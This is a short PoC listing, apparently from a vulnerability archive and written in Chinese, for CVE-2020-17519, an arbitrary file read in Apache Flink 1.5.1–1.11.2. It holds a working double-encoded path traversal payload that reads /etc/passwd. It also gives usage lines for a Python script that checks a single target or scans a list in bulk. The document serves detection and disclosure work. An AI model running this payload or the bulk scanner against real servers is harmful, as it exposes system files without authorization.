CVE-2020-17519 PoC — Apache Flink 安全漏洞

Source

Associated Vulnerability

Description

CVE-2020-17519; Apache Flink 任意文件读取; 批量检测

Readme

## CVE-2020-17519 Apache Flink 任意文件读取

### 影响范围

Apache Flink 1.5.1 ~ 1.11.2

POC

`/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd`

### 脚本使用方法

python3 CVE-2020-17519 --help  查看使用帮助

python3 CVE-2020-17519 -u http://127.0.0.1:8080 检测某个地址是否存在漏洞

python3 CVE-2020-17519 -f target.txt	批量检测漏洞

### 免责声明

由传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。

File Snapshot

 [4.0K]  /data/pocs/d4a8610b487d7996ca3d538d4ff54c8e1a0c379c
├── [2.6K]  CVE-2020-17519.py
├── [ 623]  README.md
└── [  22]  target.txt

0 directories, 3 files

Remarks